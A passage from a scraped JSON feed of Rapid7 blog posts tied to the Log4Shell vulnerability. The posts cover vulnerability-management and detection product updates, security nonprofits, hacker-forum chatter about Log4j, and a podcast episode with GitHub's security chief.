organization is to active threats and inform prioritization decisions around remediation efforts. 
\n\nWe have also added a new \u201cCISA KEV (known exploited vulnerability)\u201d vulnerability category to allow for more targeted scanning (i.e., scanning the environment for CISA KEV entries only). You can also use the CISA KEV category to filter scan reports.\n\n## [Insight VM and Nexpose] A new credential type to support scanning Oracle Databases by Service Name\n\nInsightVM and Nexpose customers have always been able to scan Oracle databases using SIDs (system identifiers) but were previously unable to provide a Service Name in the credential. This meant a gap in visibility for Oracle databases that could only be accessed via their Service Name. We were not happy with this limitation. Now, you can configure Oracle Database scans to specify a Service Name instead of an SID (you can still use the SID, if you want!) when authenticating. You now have visibility into a wider range of Oracle Database deployment configurations and the ability to configure scans using either a Service Name or an SID.\n\n## [Insight VM and Nexpose] Automatic Scan Assistant credentials generation\n\nLast year, [we introduced Scan Assistant](<https://www.rapid7.com/blog/post/2022/02/18/whats-new-in-insightvm-and-nexpose-q4-2021-in-review/>), which alleviates the credential management (for Scan Engine) burden on vulnerability management teams. For the Scan Assistant to communicate with the Scan Engine, it requires digital certificates to be manually created and deployed on both the target assets and the Nexpose / IVM Security Console. Manually creating the public / private key pair is a complex and error-prone process. \n\nWith this update, we are taking some more burden off the vulnerability management teams. You can now use the Shared Credentials management UI to automatically generate Scan Assistant credentials. 
This not only reduces the technical expertise and time required to manage Scan Assistant credentials but also makes for a user-friendly experience for you.\n\nLearn more in our recent blog post on [passwordless scanning](<https://www.rapid7.com/blog/post/2021/10/18/passwordless-network-scanning-same-insights-less-risk/>).\n\n\n\n## [Insight VM and Nexpose] Log4Shell mitigation checks\n\nThe product improvements list would be incomplete without an update on Log4Shell.\n\nIf you are vulnerable to Log4Shell, you can edit the JAR files on a system to take out the vulnerable code and thus not get exploited. However, it is difficult to keep a check on this manually. This update adds that extra capability to not only look at the version of Log4j that was present in your environment but also check if it has been mitigated \u2014 i.e., if the vulnerable code is removed.\n\nAuthenticated scans and Agent-based assessments can now determine whether the JNDILookup class removal mitigation for Log4Shell has been applied to Log4j JAR files on Windows systems. This will reduce the number of reports of the vulnerability on systems that are not exploitable. We also added an Obsolete Software vulnerability check for Log4j 1.x, which will let you find obsolete versions of Log4j in your environment.\n\n## Stay in charge\n\nAs always, we hope these updates will make it easier for you to stay ahead of vulnerabilities. \n\nIt almost felt like the quarter might end on a calm note, but then the world of cybersecurity never has a dull moment. The end of the quarter saw Spring4Shell, another zero-day vulnerability in the Spring Core module of Spring Framework. 
[Learn more about Rapid7's response to this vulnerability](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>) and how we are working around the clock to help our customers protect their own environments from Spring4Shell.\n\n_**Additional reading:**_\n\n * _[InsightVM Release Notes](<https://docs.rapid7.com/release-notes/insightvm/>)_\n * _[Widespread Exploitation of Critical Remote Code Execution in Apache Log4j](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>)_\n * _[The Rapid7 Annual Vulnerability Intelligence Report Webcast](<https://information.rapid7.com/2021_Vuln_Intelligence_Report_WC.html>)_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-19T17:52:17", "type": "rapid7blog", "title": "What's New in InsightVM and Nexpose: Q1 2022 in Review", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-19T17:52:17", "id": 
"RAPID7BLOG:ED80467D2D29D8DC10E754C9EA19D9AD", "href": "https://blog.rapid7.com/2022/04/19/whats-new-in-insightvm-and-nexpose-q1-2022-in-review/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-04T19:05:16", "description": "\n\n_**Editor\u2019s note: **We had planned to publish our _[_Hacky Holidays_](<https://www.rapid7.com/blog/series/hacky-holidays/hacky-holidays-2021/>)_ blog series throughout December 2021 \u2013 but then _[_Log4Shell_](<https://www.rapid7.com/blog/post/2021/12/15/the-everypersons-guide-to-log4shell-cve-2021-44228/>)_ happened, and we dropped everything to focus on this major vulnerability that impacted the entire cybersecurity community worldwide. Now that it\u2019s 2022, we\u2019re feeling in need of some holiday cheer, and we hope you\u2019re still in the spirit of the season, too. Throughout January, we\u2019ll be publishing Hacky Holidays content (with a few tweaks, of course) to give the new year a festive start. So, grab an eggnog latte, line up the carols on Spotify, and let\u2019s pick up where we left off._\n\nWhile it's always nice to receive gifts, the holiday season is more about giving \u2013 whether you're buying something nice for the people you love or giving back to the community to help ensure others enjoy the holidays as much as you do.\n\nGiving back is exactly what we'll be focusing on in today's [Hacky Holidays](<https://www.rapid7.com/blog/post/2021/12/02/hacky-holidays-from-rapid7-announcing-our-new-festive-blog-series/>) post, as it's a theme that truly resonates with those in the security industry. From white-hat hackers to those volunteering their time to make the internet a safer, more inclusive space, we've highlighted a few security-related projects that exemplify the spirit of giving back.\n\n## 1\\. The Innocent Lives Foundation\n\n[The Innocent Lives Foundation](<https://www.innocentlivesfoundation.org/>) aims to identify child predators and help bring them to justice. 
They do this by leveraging the combined power of the information security community to create tools that unmask anonymous child predators online. Then, using the data from Open Source Intelligence and cutting-edge techniques, they build a path to capturing evidence and then pass on those details to law enforcement for them to recreate.\n\nThe Innocent Lives Foundation was first started by Chris Hadnagy, who [joined us on an episode of our Security Nation podcast](<https://www.rapid7.com/blog/post/2020/01/30/how-the-innocent-lives-foundation-uses-osint-to-uncover-predators/>) back in 2020. He worked on a few cases at Social-Engineer, LLC, that tracked and captured predators who trafficked and exploited children. When he saw the impact these crimes had on innocent people, he knew he had to do something about it. As a leader in the information security community, he chose to rally a group of security experts and professionals in the social engineering field to address these problems and prevent crimes against future victims.\n\nThe foundation is serving endangered children and building a world in which all children can live innocent lives. It's difficult, emotionally taxing work, but it's making the world a better place, and it's the perfect example of giving back.\n\nIf you'd like to donate to the cause \u2014 it can cost up to $10,000 to produce one file to send to law enforcement, so donations are needed and welcomed \u2014 you can do so [here](<https://www.innocentlivesfoundation.org/donate/>). Aside from donating, there are numerous other ways to [get involved](<https://www.innocentlivesfoundation.org/get-involved/>), including reporting a case, sharing support online, or even volunteering your security skills when applications are opened.\n\n## 2\\. No More Ransom\n\nToday, ransomware is rampant. 
This fact won't surprise anyone working in the security industry, but many normal users around the world don't know what ransomware is, how to defend against it, and what to do if they fall victim to a scam. That's where [No More Ransom](<https://www.nomoreransom.org/en/index.html>) comes into play.\n\nNo More Ransom is an initiative by the National High Tech Crime Unit of the Netherlands' police, Europol's European Cybercrime Centre, Kaspersky, and McAfee with a simple mission: to help victims of ransomware retrieve their encrypted data without paying criminals a single dime in the process.\n\nThe initiative aims to achieve this mission in two ways:\n\n 1. By compiling a [repository of keys and applications](<https://www.nomoreransom.org/en/decryption-tools.html>) that can decrypt data locked by different types of ransomware\n 2. By [spreading awareness about ransomware](<https://www.nomoreransom.org/en/ransomware-qa.html>) and educating the world about prevention methods they can employ in their daily lives\n\nWhile it's not always possible to regain access to files encrypted or systems locked by ransomware, No More Ransom has helped many do exactly that with its repository. 
And by sharing simple, easy-to-follow cybersecurity advice, the initiative is creating a better-informed world of users who understand how to prevent falling victim to ransomware in the first place.\n\nIn the 5 years since its creation, the [No More Ransom initiative](<https://www.rapid7.com/blog/post/2021/07/26/decrypter-fomo-no-mo-five-years-of-the-no-more-ransom-project/>) has:\n\n * Built a library of 121 free tools\n * Been able to decrypt 151 ransomware families\n * Seen more than 6 million downloads of its tools\n * Prevented $900 million in criminal profit\n\nIf you'd like to do your part, the No More Ransom project is always looking for [new partners](<https://www.nomoreransom.org/en/partners.html>) to spread their messaging, so if your organization wants to be more security-minded and give back to the security community in general, consider joining the list of many partners. If you ever fall victim to ransomware, you can also [report the crime](<https://www.nomoreransom.org/en/report-a-crime.html>), which will help identify new types of ransomware and aid future prevention.\n\n## 3\\. CIAS Gaming\n\nEstablished by the University of Texas at San Antonio, the Center for Infrastructure Assurance and Security (CIAS) conducts research into effective ways to engage students with cybersecurity principles through educational gaming \u2014 and as part of their work, they're making cybersecurity relatable, fun, and engaging for kids.\n\nThe [CIAS Gaming program](<https://cias.utsa.edu/gaming.php>) targets 4 demographics: elementary school, middle school, high school, and colleges and universities. Their mission is to deliver quality research, training, competition, and exercise programs to advance community and organizational cybersecurity capabilities and collaboration.\n\nCurrently, the CIAS K-12 Program consists of a few educational tools. 
These include:\n\n * A collectible card game and electronic download called [Cyber Threat Defender](<http://cias.utsa.edu/ctd_cards.php>)\n * A multiplayer card game for students in third through fifth grade called [Cyber Threat Protector](<https://cias.utsa.edu/protector.php>)\n * A card game for K-2 players with simple design and reinforced concepts called [Cyber Threat Guardian](<https://cias.utsa.edu/guardian.php>)\n * An electronic game that teaches techniques for encoding and decoding ciphers to hide or discover information called [Project Cipher](<http://cias.utsa.edu/cipher.php>)\n * A testing tool and platform that gives educators a way to create quizzes and introduce students to cybersecurity principles called the [Pyramid of Knowledge](<http://cias.utsa.edu/pyramid.php>)\n * Interactive activities, like activity sheets and games, introduced to kids by the [CyBear cybersecurity mascots](<https://www.cultureofcybersecurity.com/>)\n\nCIAS Gaming is shaping the future of cybersecurity by training the next generation in cybersecurity best practices. You can access and download these tools and games via the links above, or [reach out](<https://cias.utsa.edu/contact.html>) directly to CIAS to learn more about taking part in their competitions or trainings.\n\n## 4\\. The Alliance for Securing Democracy\n\nThe [Alliance for Securing Democracy](<https://securingdemocracy.gmfus.org/>) (ASD) is a nonpartisan initiative housed within the German Marshall Fund of the United States that aims to combat autocratic efforts to undermine and interfere in democratic institutions around the world. The ASD contributes research and analysis on how a range of tools, from cyberattacks and disinformation to support for extremism, are being used to weaken democracies. 
It also provides public dashboards to expose the effects of online influence networks and the themes being promoted by foreign powers to threaten democratic institutions.\n\nThe ASD is independently funded by more than 175 private individuals and small family foundations across the political spectrum. Its team brings together a diverse staff with expertise across industries, including technology and cybersecurity, to provide research, policy recommendations, and even analysis of key issues and threats. It also has a technical advisory committee that features experts on disinformation, cybersecurity, illicit finance, and more.\n\nThe ASD has conducted a significant amount of work in the area of [cybersecurity](<https://securingdemocracy.gmfus.org/cybersecurity/>). It also has compiled a toolbox to spread awareness on various techniques being used by malign actors. Such tools include:\n\n * [The Authoritarian Interference Tracker](<https://securingdemocracy.gmfus.org/toolbox/authoritarian-interference-tracker/>), which exposes Russia and China's foreign interference activities\n * [The Information Operations Archive](<https://www.io-archive.org/>), which houses data points from known Information Operations\n * [The Hamilton 2.0 Dashboard](<https://securingdemocracy.gmfus.org/hamilton-dashboard/>), which reveals autocracies' state-backed messaging\n\nIn a more globalized and digitalized world, the work ASD is doing to protect the strength of free and open societies by shining a light on autocratic tactics, closing vulnerabilities in democratic systems, and imposing costs on those who undermine our institutions is more important than ever. You can reach them at [info@securingdemocracy.org](<mailto:info@securingdemocracy.org>) or [donate to the cause](<https://contributions.gmfus.org/ASD-Donations>).\n\n## 5\\. 
Code for Social Good\n\n[Code for Social Good](<https://app.code4socialgood.org/>) is a nonprofit organization that partners with other nonprofit companies to provide the technical help they need to achieve their missions for no cost. It's all about volunteering to promote social good: Code for Social Good has built and fostered a volunteer community that promotes welfare by supporting nonprofits in need. And that global network consists of professionals from across the tech industry, including technical writers, coders, programmers, and more.\n\nWhether you code for fun, experience, social good, or to make a better world, volunteering at Code for Social Good is a great way to give back. Anyone can [sign up](<https://c4sg.auth0.com/login?state=hKFo2SBKaXJWNm4tTWNhQmNTSl9ER2V3Q2h3eHJTRXRHdVpuWKFupWxvZ2luo3RpZNkgMGw5cTQ1OFhyVUhzZkhWa1M2X0hvT3ZsZTNjUFpHNjmjY2lk2SAzMzJEWkFRaVVpWEFYWVlLdnpKeTZFb2R5bFMycnplNQ&client=332DZAQiUiXAXYYKvzJy6EodylS2rze5&protocol=oauth2&response_type=token&scope=openid%20profile%20email%20scope&audience=https%3A%2F%2Fc4sg-api&envars=prod&auth0Client=eyJuYW1lIjoiYXV0aDAuanMiLCJ2ZXJzaW9uIjoiOC44LjAifQ%3D%3D>) as a volunteer, and then, you can browse their [list of projects](<https://app.code4socialgood.org/project/list/projects>). If you find one applicable to your skills, you can apply and wait for contact from the nonprofit. 
Nonprofits that need help can also [post projects](<https://c4sg.auth0.com/login?state=hKFo2SAxYndhbFFlWENNM3RmYXozb1U5RHhtaHgtSHNteWJlaaFupWxvZ2luo3RpZNkgNHlWZ1MyUGpMeDhRRGdKUzRhRTFGZXNadjktdTRsSTijY2lk2SAzMzJEWkFRaVVpWEFYWVlLdnpKeTZFb2R5bFMycnplNQ&client=332DZAQiUiXAXYYKvzJy6EodylS2rze5&protocol=oauth2&response_type=token&scope=openid%20profile%20email%20scope&audience=https%3A%2F%2Fc4sg-api&envars=prod&auth0Client=eyJuYW1lIjoiYXV0aDAuanMiLCJ2ZXJzaW9uIjoiOC44LjAifQ%3D%3D>) on the site and [find volunteers](<https://app.code4socialgood.org/user/list>) to assist them.\n\nAs of this writing, Code for Social Good has 138 projects posted across 122 organizations based in 87 countries. The current volunteer community consists of 2,595 volunteers, and they're always looking for more help. If you have some extra time, why not take a look and see if you can give back by volunteering your technical skills to a nonprofit in need.\n\nGiving back is an important theme of the holidays and one that's integral to the cybersecurity community. By giving back to the industry, we can encourage a healthy, flourishing practice that spreads awareness, leading to a better, safer, and brighter tomorrow.\n\nIf you're looking for ways to give back, hopefully these examples inspire you to action. 
If you'd like to stay in the holiday spirit, check out the rest of our [Hacky Holidays](<https://www.rapid7.com/blog/tag/hacky-holidays-2021/>) specials.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-04T18:44:58", "type": "rapid7blog", "title": "5 Security Projects That Are Giving Back", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-04T18:44:58", "id": "RAPID7BLOG:E3D08ECAA9A93569D5544F4D6AAEEB74", "href": "https://blog.rapid7.com/2022/01/04/5-security-projects-that-are-giving-back/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T23:08:05", "description": "\n\nIt's been a long few days as organizations' security teams have worked to map, quantify, and mitigate the immense risk presented by the [Log4Shell vulnerability within Log4j](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>). 
As can be imagined, cybercriminals are working overtime as well, as they seek out ways to exploit this vulnerability.\n\n#### Need clarity on detecting and mitigating Log4Shell?\n\n[Sign up for our webinar on Thursday, December 16, 2021](<https://www.rapid7.com/about/events-webcasts/brighttalk/524370/>)\n\nThe Rapid7 Threat Intelligence team is tracking the attacker's-eye view and the related chatter on the clear, deep, and dark web within our [Threat Intelligence platform](<https://www.rapid7.com/products/threat-command/>). Here are 4 observations based on what we've seen at the onset of the identification of CVE-2021-44228.\n\n## 1\\. We see a spike in hacker chatter and security researchers' publications about Log4j.\n\nIncreased hacker chatter is a key indicator of an emerging threat that security teams must account for. Clearly the spike here is no surprise \u2013 however, it is important to monitor and understand the types and scope of the chatter in order to get a clear picture of what's on the horizon.\n\n## 2\\. Hackers \u2013 specifically from the Russian, Chinese, and Turkish communities \u2013 show interest in the vulnerability and are actively sharing scanners and exploits.\n\nThe following two screenshots show that bad actors have already developed and shared proofs of concept exploiting the vulnerability in Log4j. They also show the extent to which this vulnerability impacts user communities such as PC gamers, social media users, Apple/iCloud customers, and more.\n\n_Screenshot: Log4Shell discussion on a Russian cybercrime forum_\n\n_Screenshot: Log4j discussion on a Turkish cybercrime forum_\n\n## 3\\. Code with a proof of concept for the exploit has been published on GitHub.\n\nThe underground cybercrime community functions like any other business model, but what sets it apart is the spirit with which bad actors share their work for mass consumption. The example above is completely open and free for anyone to access and utilize.\n\n## 4\\. 
Various scanners were published on GitHub to identify vulnerable systems.\n\nScanners are the cybercriminal's tool of choice for finding specific vulnerabilities in networks communicating via the internet. Using a scanner, any company \u2014 regardless of size \u2014 can be a target.\n\n_Screenshot: Log4j scanner discussion on Reddit_\n\n_Screenshot: A fully automated, accurate, and extensive scanner for finding vulnerable Log4j hosts_\n\n## While others look inside, we look outside\n\nThe bottom line is that threat actors are showing great interest in Log4j within underground communities, and they are leveraging these communities to share information and experience regarding exploiting this vulnerability. That emphasizes the need to quickly patch this vulnerability, before multiple cybercriminals put their hands on an exploit and start to utilize it on a large scale.\n\n_[Read more](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>) about the Log4Shell vulnerability within Log4j, and what your team can do in response._", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-14T21:05:17", "type": "rapid7blog", "title": "Log4Shell Makes Its Appearance in Hacker Chatter: 4 Observations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T21:05:17", "id": "RAPID7BLOG:E43819A7DE1DD0F60E63E67A27B9301B", "href": "https://blog.rapid7.com/2021/12/14/log4j-makes-its-appearance-in-hacker-chatter-4-observations/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-19T23:31:00", "description": "![\\[Security Nation\\] Mike Hanley of GitHub on the Log4j Vulnerability](https://blog.rapid7.com/content/images/2022/01/security_nation_logo.jpg)\n\nIn our first episode of Security Nation Season 5, Jen and Tod chat with Mike Hanley, Chief Security Officer at GitHub, all about the major vulnerability in Apache\u2019s Log4j logging library (aka Log4Shell). Mike talks about the ins and outs of GitHub\u2019s response to this blockbuster vulnerability and what could have helped the industry deal with an issue of this massive scope more effectively (hint: he drops the SBOM). They also touch on GitHub's updated policy on the sharing of exploits.\n\nStick around for our Rapid Rundown, where Tod and Jen talk about Microsoft\u2019s release of emergency fixes for Windows Server and VPN over Martin Luther King Day weekend.\n\n## Mike Hanley\n\n![\\[Security Nation\\] Mike Hanley of GitHub on the Log4j Vulnerability](https://blog.rapid7.com/content/images/2022/01/image1.jpg)\n\nMike Hanley is the Chief Security Officer at GitHub. Prior to GitHub, Mike was the Vice President of Security at Duo Security, where he built and led the security research, development, and operations functions. After Duo\u2019s acquisition by Cisco for $2.35 billion in 2018, Mike led the transformation of Cisco\u2019s cloud security framework and later served as CISO for the company. 
Mike also spent several years at CERT/CC as a Senior Member of the Technical Staff and security researcher focused on applied R&D programs for the US Department of Defense and the Intelligence Community.\n\nWhen he\u2019s not talking about security at GitHub, Mike can be found enjoying Ann Arbor, MI with his wife and seven kids.\n\n## Show notes\n\n**Interview links**\n\n * Read [GitHub\u2019s blog](<https://github.blog/2021-12-13-githubs-response-to-log4j-vulnerability-cve-2021-44228/>) on the Log4j vulnerability, and [the follow-up](<https://github.blog/2021-12-14-using-githubs-security-features-identify-log4j-exposure-codebase/>).\n * Check out GitHub\u2019s [Dependabot](<https://github.com/dependabot>).\n * Find out [Why Johnny Can\u2019t Encrypt](<https://www.usenix.org/conference/8th-usenix-security-symposium/why-johnny-cant-encrypt-usability-evaluation-pgp-50>).\n * Learn about [GitHub\u2019s Sponsor Program](<https://github.com/sponsors>).\n * Read about the work going on at [OpenSSF](<https://openssf.org/>).\n * Delve into Mike\u2019s [blog post on GitHub\u2019s exploit code policy](<https://github.blog/2021-06-04-updates-to-our-policies-regarding-exploits-malware-and-vulnerability-research/>).\n\n**Rapid Rundown links**\n\n * Get the info on [Microsoft\u2019s emergency fixes](<https://www.bleepingcomputer.com/news/microsoft/microsoft-releases-emergency-fixes-for-windows-server-vpn-bugs/>) for Windows Server and VPN bugs.\n\nLike the show? Want to keep Jen and Tod in the podcasting business? 
Feel free to rate and review with your favorite podcast purveyor, like [**Apple Podcasts**](<https://podcasts.apple.com/us/podcast/security-nation/id1124543784#see-all/reviews>).\n\n#### Want More Inspiring Stories From the Security Community?\n\n[Subscribe to Security Nation Today](<https://podcasts.apple.com/us/podcast/security-nation/id1124543784>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-19T21:47:30", "type": "rapid7blog", "title": "[Security Nation] Mike Hanley of GitHub on the Log4j Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-19T21:47:30", "id": "RAPID7BLOG:078D5EE222682A75AE1A1A3A3684E38D", "href": "https://blog.rapid7.com/2022/01/19/security-nation-mike-hanley-of-github-on-the-log4j-vulnerability/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-06T21:04:20", "description": "\n\n**More context and customization around detections and investigations, expanded dashboard capabilities, and more.**\n\nThis post offers a closer look at some of the recent releases in 
[InsightIDR](<https://www.rapid7.com/products/insightidr/>), our [extended detection and response (XDR)](<https://www.rapid7.com/blog/post/2021/11/09/insightidr-was-xdr-before-xdr-was-even-a-thing-an-origin-story/>) solution, from Q4 2021. Over the past quarter, we delivered updates to help you make more informed decisions, accelerate your time to respond, and customize your detections and investigations. Here's a rundown of the highlights.\n\n## More customization options for your detection rules\n\nInsightIDR provides a highly curated detections library, vetted by the security operations center (SOC) experts on our [managed detection and response (MDR)](<https://www.rapid7.com/services/managed-services/managed-detection-and-response-services/>) team \u2014 but we know some teams may want the ability to fine-tune these even further. In our [Q3 wrap-up](<https://www.rapid7.com/blog/post/2021/10/05/whats-new-in-insightidr-q3-2021-in-review/>), we highlighted our new [detection rules](<https://docs.rapid7.com/insightidr/detection-rules/>) management experience. This quarter, we've made even more strides in leveling up our capabilities around detections to help you make more informed decisions and accelerate your time to respond.\n\n_Attacker Behavior Analytics Detection Rules viewed and sorted by rule priority_\n\n * **New detection rules management interface:** With this new interface, you can see a priority field for each detection provided by InsightIDR with new actions available. 
\n * Change priority of detections and exceptions that are set to Creates Investigation as the Rule Action.\n * View and sort on priority from the main detection management screen.\n * More details on our detection rules experience can be found in our help docs, [here](<https://docs.rapid7.com/insightidr/detection-rules>).\n * ****Customizable priorities for UBA detection rules and custom alerts: ****Customers can now associate a [rule priority](<https://docs.rapid7.com/insightidr/modify-uba-detection-rules#change-rule-priority>) (Critical, High, Medium, or Low) for all of their UBA and custom alert detection rules. The priority is subsequently applied to investigations created by a detection rule.\n * ****A simplified way to create exceptions:**** We added a new section to detection rule details within \"create exception\" to better inform on which data to write [exceptions](<https://docs.rapid7.com/insightidr/modify-detection-rules#add-exceptions>) against. This will show up to the 5 most recent matches associated with that said detection rule \u2014 so now, when you go to write exceptions, you have all the information you may need all within one window.\n\n## MITRE ATT&CK Matrix for detection rules\n\nThis new view maps detection rules to MITRE tactics and techniques commonly used by attackers. The view lets you see where you have coverage with Rapid7's out-of-the-box detection rules for common attacker use cases and dig into each rule to understand the nature of that detection.\n\n_MITRE ATT&CK Matrix within Detection Rules_\n\n## Investigation Management reimagined\n\nAt Rapid7, we know how limited a security analyst's time is, so we reconfigured our [Investigation Management](<https://docs.rapid7.com/insightidr/investigations/>) experience to help our users improve the speed and quality of their decision-making when it comes to investigations. 
Here's what you can expect:\n\n * A revamped user interface with expandable cards displaying investigation information\n * The ability to view, set, and update the priority, status, or disposition of an investigation\n * Filtering by the following fields: date range, assignee, status, priority level\n_New investigations interface_\n\nWe also introduced MITRE-driven insights in Investigations. Now, you can click into the new MITRE ATT&CK tab of the Evidence panel in Investigation to see descriptions of each tactic, technique, and sub-technique curated by MITRE and link out to [attack.mitre.org](<https://attack.mitre.org/>) for more information.\n\n_MITRE ATT&CK tab within Investigations Evidence panel_\n\n## Rapid7's ongoing emergent threat response to Log4Shell\n\nLike the rest of the security community, we have been internally responding to the critical remote code execution vulnerability in Apache's Log4j Java library (a.k.a. Log4Shell).\n\nThrough continuous collaboration and ongoing threat landscape monitoring, our Incident Response, Threat Intelligence and Detection Engineering, and MDR teams are working together to provide product coverage for the latest techniques being used by malicious actors. 
You can see updates on our InsightIDR and MDR detection coverage [here](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/#insightidrandmanageddetectionandresponse>) and in-product.\n\nStay up to date with the latest on Log4Shell:\n\n * View [Log4Shell AttackerKB](<https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell?referrer=home>) for our analysis\n * Check out [The Everyperson's Guide to Log4Shell](<https://www.rapid7.com/blog/post/2021/12/15/the-everypersons-guide-to-log4shell-cve-2021-44228/>)\n * Head to our [Log4Shell Resource Center](<https://www.rapid7.com/log4j-cve-2021-44228-customer-resources/>) for up-to-date information for customers\n\n## A continually expanding library of pre-built dashboards\n\nInsightIDR's [Dashboard Library](<https://docs.rapid7.com/insightidr/dashboards-and-reports/>) has a growing repository of pre-built dashboards to save you time and eliminate the need for you to build them from scratch. In Q4, we released 15 new pre-built dashboards covering:\n\n * Compliance (PCI, HIPAA, ISO)\n * General Security (Firewall, Asset Authentication)\n * Security Tools (Okta, Palo Alto, Crowdstrike)\n * Enhanced Network Traffic Analysis\n * Cloud Security\n_Dashboard Library in InsightIDR_\n\n## Additional dashboard and reporting updates\n\n * ****Updates to dashboard filtering:**** Dashboard Filtering gives users the ability to further query LEQL statements and the data across all the cards in their dashboard. 
Customers can now populate the dashboard filter with Saved Queries from Log Search, as well as save a filter to a dashboard, eliminating the need to rebuild it every session.\n * ****Chart captions:**** We've added the ability for users to write plain text captions on charts to provide extra context about a visualization.\n * ****Multi-group-by queries and drill-in functionality:**** We've enabled Multi-group-by queries (already being used in Log search) so that customers can leverage these in their dashboards and create cards with layered data that they can drill in and out of.\n\n## Updates to Log Search and Event Sources\n\nWe recently introduced Rapid7 Resource Names (RRN), which are unique identifiers added to users, assets, and accounts in log search. An RRN serves as a unique identifier for platform resources at Rapid7. This unique identifier will stay consistent with the resource regardless of any number of names/labels associated with the resource.\n\nIn log search, an \u201cR7_context\" object has been added for log sets that have an attributed user, asset, account, or local accounts. Within the \u201cR7_context\" object, you will see any applicable RRNs appended. 
